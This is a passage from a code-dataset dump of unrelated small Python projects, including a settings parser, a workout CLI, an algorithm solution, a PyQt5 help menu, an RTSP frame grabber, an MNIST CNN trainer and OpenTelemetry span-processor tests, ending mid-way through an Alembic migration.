possible_values_str: str or NoneType\r\n :return: tuple\r\n \"\"\"\r\n # If possible_values are not list and possible_values_str is None:\r\n if (not isinstance(possible_values, list)) and possible_values_str is None:\r\n raise ValueError(\"If possible_values is not a list, possible_values_str must not be None.\")\r\n\r\n # If possible_values is a list:\r\n if isinstance(possible_values, list):\r\n def result_func(elem):\r\n return elem in possible_values\r\n\r\n # If string representation of list is absent, create one:\r\n if possible_values_str is None:\r\n result_str = str(possible_values)\r\n else:\r\n result_str = possible_values_str\r\n\r\n # If possible_values is a function:\r\n elif callable(possible_values):\r\n def result_func(elem):\r\n return possible_values(elem)\r\n\r\n result_str = possible_values_str\r\n\r\n # Otherwise raise an error:\r\n else:\r\n raise ValueError(\"possible_values must be list or function.\")\r\n\r\n return tuple([result_func, result_str])\r\n\r\n def set_value(self, current_value):\r\n \"\"\"\r\n Change current value of setting or return ValueError.\r\n :param current_value: str\r\n :return: NoneType\r\n \"\"\"\r\n # Checking:\r\n if not self._possible_values_func(current_value):\r\n raise ValueError(\"Setting value not in possible_values.\")\r\n\r\n # Setting:\r\n self._current_value = current_value\r\n\r\n\r\nclass Settings:\r\n \"\"\"\r\n Class representing a group of settings.\r\n \"\"\"\r\n def __init__(self, list_of_settings):\r\n \"\"\"\r\n Initialise by list of settings.\r\n :param list_of_settings: list\r\n \"\"\"\r\n # Checking argument (it must be a list that\r\n # contains only Setting objects):\r\n if not isinstance(list_of_settings, list) or \\\r\n False in [isinstance(elem, Setting) for elem\r\n in list_of_settings]:\r\n raise ValueError(\"Instance of a Settings class \"\r\n \"can be only initialised by list of\"\r\n \" Setting objects.\")\r\n\r\n # Initialising:\r\n self._all_settings = []\r\n\r\n for setting in list_of_settings:\r\n self._all_settings.append(setting)\r\n\r\n def setting_by_name(self, setting_name):\r\n \"\"\"\r\n Return Setting object for modifying it.\r\n :param setting_name: str\r\n :return: Setting\r\n \"\"\"\r\n # Checking input:\r\n if not isinstance(setting_name, str):\r\n raise ValueError(\"Name of the setting must be str.\")\r\n\r\n # Checking if there is a setting:\r\n if setting_name not in [setting.get_setting_name()\r\n for setting in\r\n self._all_settings]:\r\n raise ValueError(\"There is no such setting.\")\r\n\r\n # If everything is ok:\r\n return self._all_settings[[setting.get_setting_name()\r\n for setting in\r\n self._all_settings\r\n ].index(setting_name)]\r\n\r\n def read_file(self, file_name):\r\n \"\"\"\r\n Read information from the file with settings and\r\n change current settings. Ignore lines with errors.\r\n :param file_name: str\r\n :return: NoneType\r\n \"\"\"\r\n def read_line(file_line):\r\n \"\"\"\r\n Try to change value of Setting described in line of\r\n the file. Argument is a line. If something is\r\n incorrect, error will be raised.\r\n :param file_line: str\r\n :return: NoneType\r\n \"\"\"\r\n # First input check:\r\n if not isinstance(file_line, str):\r\n raise ValueError(\"Line of the file must be str.\")\r\n\r\n # List of words from line of a file (and removing \"\\n\" from the end of the line):\r\n words = file_line[:-1].split(\" \")\r\n\r\n # Second input check (if third word exists and if second word is \"=\"):\r\n if words[1] != \"=\" or len(words[2]) == 0:\r\n raise ValueError(\"Line of the setting file is \"\r\n \"not correct:\\n\" + file_line)\r\n\r\n # Trying to change a setting (if arguments are\r\n # incorrect, errors will be raised):\r\n setting = self.setting_by_name(words[0])\r\n setting.set_value(words[2])\r\n\r\n # Opening a file and getting list of lines:\r\n file = open(file_name, \"r\")\r\n lines = file.readlines()\r\n file.close()\r\n\r\n # Working about each line (ignore corrupted lines):\r\n for line in lines:\r\n try:\r\n read_line(line)\r\n # Yes, cause is broad, but I want to ignore all\r\n # errors:\r\n except:\r\n pass\r\n\r\n def write_into_file(self, file_name):\r\n \"\"\"\r\n Write settings into a text file (or rewrite it).\r\n :param file_name: str\r\n :return: NoneType\r\n \"\"\"\r\n # Checking argument:\r\n if not isinstance(file_name, str):\r\n raise ValueError(\"File name must be str.\")\r\n\r\n # Opening the file for writing:\r\n file = open(file_name, \"w\")\r\n\r\n # Writing:\r\n for setting in self._all_settings:\r\n file.write(repr(setting) + \"\\n\")\r\n\r\n # Closing a file:\r\n file.close()\r\n\r\n def __str__(self):\r\n \"\"\"\r\n Return string representation of all the settings of a group.\r\n :return: str\r\n \"\"\"\r\n result_str = \"\"\r\n for setting in self._all_settings:\r\n result_str = result_str + \"\\n\" + str(setting) + \"\\n\"\r\n # [1:] to remove \"\\n\" which is in the beginning of a result_str:\r\n return result_str[1:]\r\n","repo_name":"Stefaniv-M/Stefaniv_Mykola_coursework","sub_path":"Coursework_Stages/4/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":9933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35261460014","text":"from modules.tracking import tracking\r\nfrom modules.timer import timer\r\nfrom constants.constants import *\r\nfrom utilities.validations import selectField\r\nfrom data.sleep import sleepData\r\nfrom data.exercises import exercises\r\nfrom utilities.helpers import *\r\nimport json\r\n\r\ncond = False\r\ncustom = []\r\n\r\ndef callTimer(type,message):\r\n if len(type)==3:\r\n h,m,s=type\r\n timer(\"timer\",h,m,s,message)\r\n clear()\r\n\r\n\r\ndef exercise():\r\n dict = exercises[int(custom[0])]\r\n \r\n for workout in dict[\"workouts\"]:\r\n \r\n level = {\r\n \"1\": \"00:00:10\" if workout[\"type\"]==\"timer\" else \"x6\",\r\n \"2\": \"00:00:40\" if workout[\"type\"]==\"timer\" else \"x12\",\r\n \"3\": \"00:00:60\" if workout[\"type\"]==\"timer\" else \"x18\",\r\n }\r\n\r\n del workout[\"type\"]\r\n\r\n print(f'{dict[\"title\"]}\\n',json.dumps(workout, indent=4))\r\n\r\n type=level[custom[1]].split(\":\")\r\n\r\n if len(type)==1:\r\n print(f\"\\nDo {type} reps\")\r\n next=input(\"Enter (n|N) for next:\")\r\n\r\n while not(next.isalpha() and next.upper()==\"N\"):\r\n print(f\"\\033[A{input_err}\\033[A\")\r\n next=input(\"Enter (n|N) for next:\")\r\n \r\n else:\r\n callTimer(type,\"Good job\")\r\n \r\n \r\n print(\"Take a rest!\")\r\n callTimer(\"00:00:30\",\"Good job\")\r\n \r\n\r\n \r\n\r\ndef options(title):\r\n global cond\r\n print(title)\r\n option = selectField(\"number\", input(option_prompt))\r\n\r\n if option in [\"1\", \"2\", \"3\"] and not cond:\r\n cond = True\r\n custom.append(option)\r\n clear()\r\n options(exercise_title)\r\n elif option in [\"1\", \"2\", \"3\"] and cond:\r\n clear()\r\n custom.append(option)\r\n exercise()\r\n else:\r\n print(input_err)\r\n\r\n\r\ndef workoutPlan():\r\n options(f'Workout Plan\\n {workout_title}')\r\n back()\r\n\r\n\r\ndef sleepTracking():\r\n\r\n print(\"Sleep Tracking\\n\", tracking_title)\r\n\r\n option = selectField(\"number\", input(option_prompt))\r\n\r\n if option in [\"1\", \"2\", \"3\"]:\r\n clear()\r\n tracking(\"sleep\",option, sleepData)\r\n\r\n else:\r\n print(input_err)\r\n\r\n back()\r\n","repo_name":"ragusrinivasan/-urban-fortnight","sub_path":"modules/sleep_exercise.py","file_name":"sleep_exercise.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5731027549","text":"from itertools import combinations \nimport sys\ninput = sys.stdin.readline\n\nsize = int(input())\nmatrix = [list(map(int, input().split())) for _ in range(size)]\n\nflowerA = []\nflowerB = []\nflowerC = []\nanswer = 0\n\n# (1, 1) ~ (size-2, szie-2) 3개\n\nflower_list = []\nfor i in range(1, size-1):\n for j in range(1, size-1):\n flower_list.append((i, j))\n\ndef disable_location(locations):\n [a, b, c] = locations\n\n if abs(a[0] - b[0]) + abs(a[1] - b[1]) <= 2:\n return True\n \n if abs(b[0] - c[0]) + abs(b[1] - c[1]) <= 2:\n return True\n \n if abs(c[0] - a[0]) + abs(c[1] - a[1]) <= 2:\n return True\n \n return False\n\ndx = [0, 1, -1, 0, 0]\ndy = [0, 0, 0, 1, -1]\n\ndef get_cost(locations):\n cost = 0\n\n for location in locations:\n x, y = location\n\n for i in range(5):\n nx = x + dx[i]\n ny = y + dy[i]\n\n cost += matrix[nx][ny]\n \n return cost\n\nanswer = sys.maxsize\nfor locations in combinations(flower_list, 3):\n if disable_location(locations):\n continue\n \n cost = get_cost(locations)\n if answer > cost:\n answer = cost\n\nprint(answer)","repo_name":"BangDori/python-algorithm","sub_path":"baekjoon/14620.py","file_name":"14620.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37243554226","text":"\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon, QMovie\nPath = \"resources/base/Gui/\"\nPathGifs = \"resources/base/Gifs/\"\n\nclass Ui_HelpMenu(object):\n def setupUi(self, HelpMenu):\n HelpMenu.setObjectName(\"HelpMenu\")\n HelpMenu.resize(375, 812)\n HelpMenu.setMinimumSize(QtCore.QSize(375, 812))\n HelpMenu.setMaximumSize(QtCore.QSize(375, 812))\n self.MainHelpcenter = QtWidgets.QWidget(HelpMenu)\n self.MainHelpcenter.setObjectName(\"MainHelpcenter\")\n self.Closegui = QtWidgets.QPushButton(self.MainHelpcenter)\n self.Closegui.setGeometry(QtCore.QRect(330, 5, 36, 36))\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.Closegui.sizePolicy().hasHeightForWidth())\n self.Closegui.setSizePolicy(sizePolicy)\n self.Closegui.setMinimumSize(QtCore.QSize(36, 36))\n \n self.Closegui.setStyleSheet(\"QPushButton {\\n\"\n\" \\n\"\n\"border-radius: 5px;\\n\"\n\" \\n\"\n\"\\n\"\n\"color: #000000;\\n\"\n\" \\n\"\n\" }\\n\"\n\"\\n\"\n\"QPushButton:pressed {\\n\"\n\"border-radius: 5px;\\n\"\n\" \\n\"\n\"background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:1, stop:0 rgba(0, 255, 255, 255), stop:1 rgba(0, 255, 152, 255));\\n\"\n\"color: rgb(0, 0, 0);\\n\"\n\" }\\n\"\n\".QPushButton:hover {\\n\"\n\"border-radius: 5px;\\n\"\n\" \\n\"\n\" background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:1, stop:0 rgba(0, 199, 199, 255), stop:1 rgba(0, 190, 113, 255));\\n\"\n\"color: rgb(0, 0, 0);\\n\"\n\" }\\n\"\n\"color: rgb(255, 255, 255);\\n\"\n\"border-radius: 5px;\")\n self.Closegui.setText(\"\")\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(Path+\"/close.svg\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.Closegui.setIcon(icon)\n self.Closegui.setIconSize(QtCore.QSize(36, 36))\n self.Closegui.setObjectName(\"Closegui\")\n self.BGhelp = QtWidgets.QLabel(self.MainHelpcenter)\n self.BGhelp.setGeometry(QtCore.QRect(0, -8, 401, 791))\n self.BGhelp.setText(\"\")\n self.BGhelp.setPixmap(QtGui.QPixmap(Path+\"/Help BG.png\"))\n self.BGhelp.setScaledContents(True)\n self.BGhelp.setObjectName(\"BGhelp\")\n self.GifStack = QtWidgets.QStackedWidget(self.MainHelpcenter)\n self.GifStack.setGeometry(QtCore.QRect(20, 100, 331, 631))\n self.GifStack.setObjectName(\"GifStack\")\n self.page = QtWidgets.QWidget()\n self.page.setObjectName(\"page\")\n self.label = QtWidgets.QLabel(self.page)\n self.label.setGeometry(QtCore.QRect(0, 0, 331, 631))\n self.label.setText(\"\")\n self.label.setScaledContents(True)\n self.label.setObjectName(\"label\")\n self.GifStack.addWidget(self.page)\n self.page_2 = QtWidgets.QWidget()\n self.page_2.setObjectName(\"page_2\")\n self.label_2 = QtWidgets.QLabel(self.page_2)\n self.label_2.setGeometry(QtCore.QRect(0, 0, 331, 631))\n self.label_2.setText(\"\")\n self.label_2.setScaledContents(True)\n self.label_2.setObjectName(\"label_2\")\n self.GifStack.addWidget(self.page_2)\n self.page_3 = QtWidgets.QWidget()\n self.page_3.setObjectName(\"page_3\")\n self.label_3 = QtWidgets.QLabel(self.page_3)\n self.label_3.setGeometry(QtCore.QRect(0, 0, 331, 631))\n self.label_3.setText(\"\")\n self.label_3.setScaledContents(True)\n self.label_3.setObjectName(\"label_3\")\n self.GifStack.addWidget(self.page_3)\n self.Titlehelp = QtWidgets.QLabel(self.MainHelpcenter)\n self.Titlehelp.setGeometry(QtCore.QRect(90, 10, 181, 41))\n \n self.gif = QMovie(PathGifs+'/DevMode.gif')\n self.label.setMovie(self.gif)\n self.gif.start()\n font = QtGui.QFont()\n font.setFamily(\"Ravie\")\n font.setPointSize(19)\n font.setBold(True)\n font.setWeight(75)\n self.Titlehelp.setFont(font)\n self.Titlehelp.setStyleSheet(\"background-color:#0d213c;\\n\"\n\"color:#ffffff; font-size:18px;\\n\"\n\"\\n\"\n\"border-radius: 10px;\")\n self.Titlehelp.setAlignment(QtCore.Qt.AlignCenter)\n self.Titlehelp.setObjectName(\"Titlehelp\")\n self.BckHelp = QtWidgets.QPushButton(self.MainHelpcenter)\n self.BckHelp.setGeometry(QtCore.QRect(20, 740, 141, 31))\n self.BckHelp.setMinimumSize(QtCore.QSize(80, 0))\n font = QtGui.QFont()\n font.setBold(True)\n font.setWeight(75)\n self.BckHelp.setFont(font)\n self.BckHelp.setStyleSheet(\".QPushButton#BckHelp{\\n\"\n\"background-color:#ffffff;\\n\"\n\"color:#515151;\\n\"\n\"border-color:#A9EDE8;\\n\"\n\"border-style: solid;\\n\"\n\"border-width: 2px;\\n\"\n\"border-radius: 10px;\\n\"\n\" }\\n\"\n\"\\n\"\n\".QPushButton#BckHelp:hover{\\n\"\n\"background-color:#A9EDE8;\\n\"\n\" }\")\n icon1 = QtGui.QIcon()\n icon1.addPixmap(QtGui.QPixmap(Path+\"/previous.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.BckHelp.setIcon(icon1)\n self.BckHelp.setIconSize(QtCore.QSize(25, 25))\n self.BckHelp.setObjectName(\"BckHelp\")\n self.Nexthelp = QtWidgets.QPushButton(self.MainHelpcenter)\n self.Nexthelp.setGeometry(QtCore.QRect(210, 740, 141, 31))\n self.Nexthelp.setMinimumSize(QtCore.QSize(80, 0))\n font = QtGui.QFont()\n font.setBold(True)\n font.setWeight(75)\n self.Nexthelp.setFont(font)\n self.Nexthelp.setStyleSheet(\".QPushButton#Nexthelp{\\n\"\n\"background-color:#ffffff;\\n\"\n\"color:#515151;\\n\"\n\"border-color:#A9EDE8;\\n\"\n\"border-style: solid;\\n\"\n\"border-width: 2px;\\n\"\n\"border-radius: 10px;\\n\"\n\" }\\n\"\n\"\\n\"\n\".QPushButton#Nexthelp:hover{\\n\"\n\"background-color:#A9EDE8;\\n\"\n\" }\")\n icon2 = QtGui.QIcon()\n icon2.addPixmap(QtGui.QPixmap(Path+\"/next-button.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.Nexthelp.setIcon(icon2)\n self.Nexthelp.setIconSize(QtCore.QSize(25, 25))\n self.Nexthelp.setObjectName(\"Nexthelp\")\n self.InfoHelp = QtWidgets.QLabel(self.MainHelpcenter)\n self.InfoHelp.setGeometry(QtCore.QRect(0, 60, 371, 31))\n font = QtGui.QFont()\n font.setFamily(\"Ravie\")\n font.setPointSize(16)\n font.setBold(True)\n font.setWeight(75)\n self.InfoHelp.setFont(font)\n self.InfoHelp.setStyleSheet(\"background-color:#0d213c;\\n\"\n\"color:#ffffff; font-size:16px;\\n\"\n\"\\n\"\n\"border-radius: 10px;\")\n self.InfoHelp.setAlignment(QtCore.Qt.AlignCenter)\n self.InfoHelp.setObjectName(\"InfoHelp\")\n #self.InfoHelp.setText(\"test\")\n self.BGhelp.raise_()\n self.Closegui.raise_()\n self.GifStack.raise_()\n self.Titlehelp.raise_()\n self.BckHelp.raise_()\n self.Nexthelp.raise_()\n self.InfoHelp.raise_()\n HelpMenu.setCentralWidget(self.MainHelpcenter)\n self.statusbar = QtWidgets.QStatusBar(HelpMenu)\n self.statusbar.setObjectName(\"statusbar\")\n HelpMenu.setStatusBar(self.statusbar)\n\n self.retranslateUi(HelpMenu)\n QtCore.QMetaObject.connectSlotsByName(HelpMenu)\n\n def retranslateUi(self, HelpMenu):\n _translate = QtCore.QCoreApplication.translate\n HelpMenu.setWindowTitle(_translate(\"HelpMenu\", \"MainWindow\"))\n self.Closegui.setToolTip(_translate(\"HelpMenu\", \"Exit\"))\n self.Closegui.setStatusTip(_translate(\"HelpMenu\", \"Exit\"))\n self.label.setStatusTip(_translate(\"HelpMenu\", \"Help Gif\"))\n self.label_2.setStatusTip(_translate(\"HelpMenu\", \"Help Gif\"))\n self.label_3.setStatusTip(_translate(\"HelpMenu\", \"Help Gif\"))\n self.Titlehelp.setText(_translate(\"HelpMenu\", \"Help Menu\"))\n self.BckHelp.setToolTip(_translate(\"HelpMenu\", \"Go one Step Back\"))\n self.BckHelp.setStatusTip(_translate(\"HelpMenu\", \"Go one Step Back\"))\n self.BckHelp.setText(_translate(\"HelpMenu\", \"Back\"))\n self.Nexthelp.setToolTip(_translate(\"HelpMenu\", \"Move to next Step\"))\n self.Nexthelp.setStatusTip(_translate(\"HelpMenu\", \"Move to next Step\"))\n self.Nexthelp.setText(_translate(\"HelpMenu\", \"Next\"))\n self.InfoHelp.setText(_translate(\"HelpMenu\", \"Unlock Dev Mode & Debug\"))\n \n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n HelpMenu = QtWidgets.QMainWindow()\n ui = Ui_HelpMenu()\n ui.setupUi(HelpMenu)\n HelpMenu.show()\n sys.exit(app.exec_())\n","repo_name":"RetiredQQ/BotIt","sub_path":"Source Code/Gui/HelpProject.py","file_name":"HelpProject.py","file_ext":"py","file_size_in_byte":8648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"4387738390","text":"\nimport cv2\nimport timeit\nimport os\nimport datetime\nimport sys\nfrom creds import CAMERA_URL\n\nbasedir = os.path.dirname(__file__)\n\nif len(sys.argv) > 1:\n picdirname = f\"pics-{datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}-{sys.argv[1]}\"\nelse:\n picdirname = f\"pics-{datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}\"\n\npicdir = os.path.join(basedir, picdirname)\n\ndir_created = False\nprint(\"Pictures will be saved inside:\", picdir)\n\n#vcap = cv2.VideoCapture(CAMERA_URL)\nvcap = cv2.VideoCapture(CAMERA_URL, cv2.CAP_FFMPEG)\n\nlast_stamp = None\n\ndelays = []\ni = 0\nSAVED_COUNT = 0\n# Caputer an image every 2 seconds\nAUTO_CAPUTER_TIME = 2.0\n\nwhile True:\n i += 1\n start = timeit.default_timer()\n ret, frame_raw = vcap.read()\n delta = timeit.default_timer() - start\n if not ret:\n print(\"ERRORE!!!\", file=sys.stderr)\n break\n delays.append(delta)\n\n # remove header (i.e. datetime specs)\n frame = frame_raw[frame_raw.shape[0]//10:,:,:]\n\n cv2.imshow('VIDEO', frame)\n if i % 50 == 0:\n print(f\"Stats [{i//50}]:\")\n print(f\"\\tmin: \\t{min(*delays)}\")\n print(f\"\\tmax: \\t{max(*delays)}\")\n print(f\"\\tavg: \\t{sum(delays)/len(delays)}\")\n print(f\"\\tsum: \\t{sum(delays)}\")\n print(f\"\\tcount: {len(delays)}\")\n print()\n delays.clear()\n\n key = cv2.waitKey(1)\n\n if key == ord('q'):\n break\n\n if key == ord('a'):\n if last_stamp is not None:\n last_stamp = None\n else:\n print(\"******* A picture will be automaticcally taken every 2 seconds *******\")\n last_stamp = timeit.default_timer()\n\n if key == ord('s') or (last_stamp is not None and timeit.default_timer() - last_stamp >= AUTO_CAPUTER_TIME):\n now = datetime.datetime.now()\n filename = f\"pic-{now.strftime('%Y-%m-%d_%H-%M-%S.%f')}.jpg\"\n\n if not dir_created:\n dir_created = True\n os.mkdir(picdir)\n print(f\"Created directory '{picdir}'\")\n\n savepath = os.path.join(picdir, filename)\n print(f\"Stampa immagine '{filename}' ({savepath})... \", end='')\n cv2.imwrite(savepath, frame)\n print(\"DONE!\")\n print()\n\n SAVED_COUNT += 1\n\n if last_stamp is not None:\n last_stamp = timeit.default_timer()\n\nif SAVED_COUNT:\n print(f\"Caputerd {SAVED_COUNT} images inside '{os.path.relpath(picdir)}'\")\nelse:\n print(\"No picture saved!\")\n","repo_name":"Tredici/Opencv-3D-scripts","sub_path":"rtsp_stream.py","file_name":"rtsp_stream.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15621342387","text":"\"\"\"\nAuthor: Moshtach Ismail\nThis script converts the raw counts to normalized counts and removes\nthe versions out of the gene name\n\"\"\"\nimport csv\nimport pandas as pd\nimport sys\n\ndef main(input, output):\n filter(input, output)\n print(\"normalizing the raw_counts is done. \")\n\ndef filter(input, output):\n \"\"\"\n make a new file where only the first and last gene names are in\n the file, because the last column of the file already has the\n values that we need.\n :return: the new file with 1st and last column\n \"\"\"\n print(\"normalizing.py started running\")\n print(pd.__version__)\n print(csv.__version__)\n gene_values= [] # gene names\n values = []\n #df = pd.read_table(input, sep='\\t', usecols=[0,3], skiprows=4)\n df = pd.read_table(input, sep='\\t', skiprows=4)\n q = df.iloc[:,0] # only gets first value of each row\n r = df.iloc[:,1] # gets the second value\n\n for a in r:\n values.append(a)\n for x in q:\n gene_values.append(x)\n\n print(\"amount of values found\", len(values))\n print(\"b\", len(gene_values))\n\n #normalize values\n amin, amax = min(values), max(values)\n for i, val in enumerate(values):\n values[i] = (val - amin) / (amax - amin)\n #print(values) # prints normalized values\n\n # put the new values in a txt file\n with open(output, 'w') as f:\n writer = csv.writer(f, delimiter='\\t')\n writer.writerows(zip(gene_values, values))\n\n\nif __name__ == '__main__':\n main(sys.argv[1], sys.argv[2])\n #1. is the input file\n #2. is the output file\n\n","repo_name":"moshtachismail/final_blok10","sub_path":"src/normalizing.py","file_name":"normalizing.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27598155906","text":"# testing audio to midi conversion\n# import librosa \n# audio_data, sample_rate = librosa.load('audio_file.wav')\n\n# from librosa.core import piptrack\n# pitch, magnitude = piptrack(audio_data, sr=sample_rate, fmin=50, fmax=2000)\n\nfrom midiutil.MidiFile import MIDIFile\nmidi = MIDIFile(numTracks=1)\ntrack = 0\ntime = 0\nchannel = 0\nvolume = 100\nmidi.addTrackName(track, time, \"Track\")\nmidi.addTempo(track, time, 120)\nfor i in range(len(pitch)):\n pitch_value = int(round(pitch[i]))\n if pitch_value != -1:\n time += 1\n midi.addNote(track, channel, pitch_value, time, 1, volume)\nwith open(\"output.mid\", \"wb\") as output_file:\n midi.writeFile(output_file)","repo_name":"Furretfurretfurret/Music-transcription","sub_path":"backend/audio_to_midi.py","file_name":"audio_to_midi.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10352794383","text":"from unittest.mock import Mock, patch\n\nimport pytest\n\nfrom lumigo_opentelemetry.resources.span_processor import (\n set_span_skip_export,\n should_skip_exporting_span,\n LumigoSpanProcessor,\n)\n\n\ndef test_set_span_no_export():\n \"\"\"\n Given a span, check that the span is marked as not exported\n \"\"\"\n\n for no_export in [True, False]:\n span_mock = Mock(set_attribute=Mock())\n set_span_skip_export(span_mock, no_export)\n (attributes,) = span_mock.set_attributes.call_args[0]\n assert attributes == {\"SKIP_EXPORT\": no_export}\n\n # Check default value\n span_mock = Mock(set_attribute=Mock())\n set_span_skip_export(span_mock)\n (attributes,) = span_mock.set_attributes.call_args[0]\n assert attributes == {\"SKIP_EXPORT\": True}\n\n\n@pytest.mark.parametrize(\n \"attributes, should_export\",\n [\n # Default is to export\n ({}, True),\n # Use the value if it is set\n ({\"SKIP_EXPORT\": False}, True),\n ({\"SKIP_EXPORT\": True}, False),\n ],\n)\ndef test_should_not_export_span(attributes, should_export):\n readable_span_mock = Mock(attributes=attributes)\n\n assert should_skip_exporting_span(readable_span_mock) is not should_export\n\n\n@patch(\"lumigo_opentelemetry.resources.span_processor.should_skip_exporting_span\")\n@patch(\"opentelemetry.sdk.trace.export.BatchSpanProcessor.on_end\")\ndef test_lumigo_span_processor_no_export_set(\n mocked_super_on_end, mocked_should_not_export_span\n):\n processor = LumigoSpanProcessor(Mock())\n readable_span_mock = Mock()\n mocked_should_not_export_span.return_value = True\n processor.on_end(span=readable_span_mock)\n\n # Check if the parent of processor BatchSpanProcessor.on_end not called\n mocked_super_on_end.assert_not_called()\n\n\n@patch(\"lumigo_opentelemetry.resources.span_processor.should_skip_exporting_span\")\n@patch(\"opentelemetry.sdk.trace.export.BatchSpanProcessor.on_end\")\ndef test_lumigo_span_processor_no_export_not_set(\n mocked_super_on_end, mocked_should_not_export_span\n):\n processor = LumigoSpanProcessor(Mock())\n readable_span_mock = Mock()\n\n # should_not_export is False. i.e. the span should be exported\n mocked_should_not_export_span.return_value = False\n processor.on_end(span=readable_span_mock)\n\n # Check if the parent of processor BatchSpanProcessor.on_end was called\n mocked_super_on_end.assert_called_once_with(readable_span_mock)\n","repo_name":"lumigo-io/opentelemetry-python-distro","sub_path":"src/test/unit/resources/test_span_processor.py","file_name":"test_span_processor.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"52"} +{"seq_id":"36245335670","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 11 01:08:36 2020\n\n@author: guilom\n\"\"\"\nfrom time import sleep\n\nimport serial\nimport socket\nimport random\nimport select\n\nhote = \"localhost\"\nport = 15555\n\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsocket.connect((hote, port))\n\n\nstop = False\n\nwith serial.Serial('/dev/cu.usbmodem142401', 9600) as serial_port:\n while not stop:\n if serial_port.inWaiting() > 0:\n b = serial_port.read()\n socket.send(b)\n\n ready = select.select([socket], [], [], 0.001)\n if ready[0]:\n response = socket.recv(1)\n serial_port.write(response)\n\n'''\nto_send = [1,2,3,4,5,6,7,7,6,5,4,3,2,1]\nb = 0\nwhile not stop:\n if b < len(to_send):\n socket.send(str(to_send[b]).encode('utf-8'))\n b+=1\n sleep(0.2)\n'''","repo_name":"NellyBarret/arduinoPiano","sub_path":"serial_reader.py","file_name":"serial_reader.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10840214309","text":"import torch\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\n\nnum_epochs = 10\nbatch_size = 256\nlr = 1e-3\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else 'cpu')\nprint(device)\n\ntrain_dataset = torchvision.datasets.MNIST(\n root = \"./data/\", train = True, transform = transforms.ToTensor(), download=True\n)\n\ntest_dataset = torchvision.datasets.MNIST(\n root = \"./data/\", train = False, transform = transforms.ToTensor()\n)\n\ntrain_loader = torch.utils.data.DataLoader(\n dataset = train_dataset, batch_size = batch_size,shuffle = True \n)\n\ntest_loader = torch.utils.data.DataLoader(\n dataset = test_dataset, batch_size = batch_size, shuffle = False\n)\n\nclass ConvNet(nn.Module):\n def __init__(self, num_classes = 10):\n super(ConvNet, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 16, kernel_size=5, stride=1, padding=2),\n nn.LazyBatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2),\n )\n self.layer2 = nn.Sequential(\n nn.Conv2d(16, 32, kernel_size=5, stride=1,padding=2),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2, stride=2),\n )\n self.fc= nn.Linear(7 * 7 * 32, num_classes)\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = out.reshape(out.size(0), -1)\n out = self.fc(out)\n return out\nmodel = ConvNet().to(device)\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr = lr)\n\ntotal_step = len(train_loader)\nfor epoch in range(num_epochs):\n for i, (images, labels) in enumerate(train_loader):\n images = images.to(device)\n labels = labels.to(device)\n\n outputs = model(images)\n loss = criterion(outputs, labels)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n print(\"Epoch[{}/{}]. Step[{}/{}], Loss:{:.4f}\".format(\n epoch + 1, num_epochs, i + 1, total_step, loss.item()\n ))\n\ntorch.save(model.state_dict(), 'cnn.pth')\nprint('Finished Training and Saving the model')","repo_name":"Xerxesqwq/mnist","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"15274098362","text":"\"\"\"enhance prototype model\n\nRevision ID: 2e225df00b00\nRevises: 14051817d850\nCreate Date: 2016-06-05 20:43:24.420000\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2e225df00b00'\ndown_revision = '14051817d850'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('prototypes', sa.Column('body_hash', sa.String(length=128), nullable=True))\n op.add_column('prototypes', 